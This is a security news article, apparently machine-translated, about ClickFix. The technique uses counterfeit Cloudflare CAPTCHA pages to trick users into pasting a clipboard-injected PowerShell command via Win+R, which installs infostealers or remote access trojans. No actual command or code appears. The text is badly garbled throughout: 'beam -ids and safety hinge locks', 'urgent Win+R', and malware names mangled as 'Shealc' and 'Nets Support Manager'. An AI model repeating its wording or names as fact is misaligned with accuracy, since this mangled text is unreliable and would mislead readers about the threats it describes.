- Clickfix uses fake CAPTCHA screens to fool users to launch malware via simple keyboard commands
- Phishing -side mimic cloudflare perfect, all the way down to beam -ids and safety hinge locks
- Click “Confirm that you are human”, starting a process that silently infects your machine with malware
A sophisticated, yet misleading simple phishing technique, is currently circulating using Fake Cloudflare CAPTCHA pages to infect users with malware.
New research from Slashnext claims that the technique, known as Clickfix, applies to well -known internet behavior that fools users to perform commands that install malicious software.
Clickfix works by presenting a counterfeit version of CloudFlares Turnstile CAPTCHA page. Everything from the visual layout to technical elements such as the Ray ID identifier is replicated convincingly.
Is linked to a quick that users will not normally examine
The phishing site may host a domain that looks like a legitimate a legitimate or on a real site that is compromised.
When users land on the page, they are asked to mark a box labeled “Confirm that you are human.” This step occurs routine and raises no suspicion – but what follows is the essence of scam: Users are controlled through a set of instructions – urgent Win+R, then Ctrl+V and eventually entered.
These steps seem harmless, but they perform a PowerShell command that has already been silently copied in the user’s clipboard.
Once executed, the command can retrieve malware such as Shealc, Lumma or even Remote Access Trojans as Nets Support Manager.
“Clickfix is a social engineering attack that fools users to run malicious commands on their own devices – all under the guise of a routine security check,” said security researcher Daniel Kelley.
What makes Clickfix especially insidious is how it transforms standard weapons security expectations. The padlock icon, well-known CAPTCHA format and a legitimate looking url all serve to lull users for compliance.
This utilizes what researchers refer to as “verification fatigue”, a user’s tendency to click through security use without proper control.
The trick is not dependent on utilizing software vulnerability, but rather on abusing trust and usual behavior.
The phishing page comes as a single HTML file, but contains embedded scripts and veiled code designed to perform clipboard injections.
Because it utilizes legitimate Windows tools and does not download executable substances, it can avoid many traditional detection tools.
Standard defense, such as antivirus software or endpoint protection, is typically aimed at catching suspicious downloads or binaries. But in this case, users are tricked into launching the threat themselves.
This highlights the need for advanced malware protection with zero-hour defense capable of detecting clipboard injections and false CAPTCHA screens in real time.
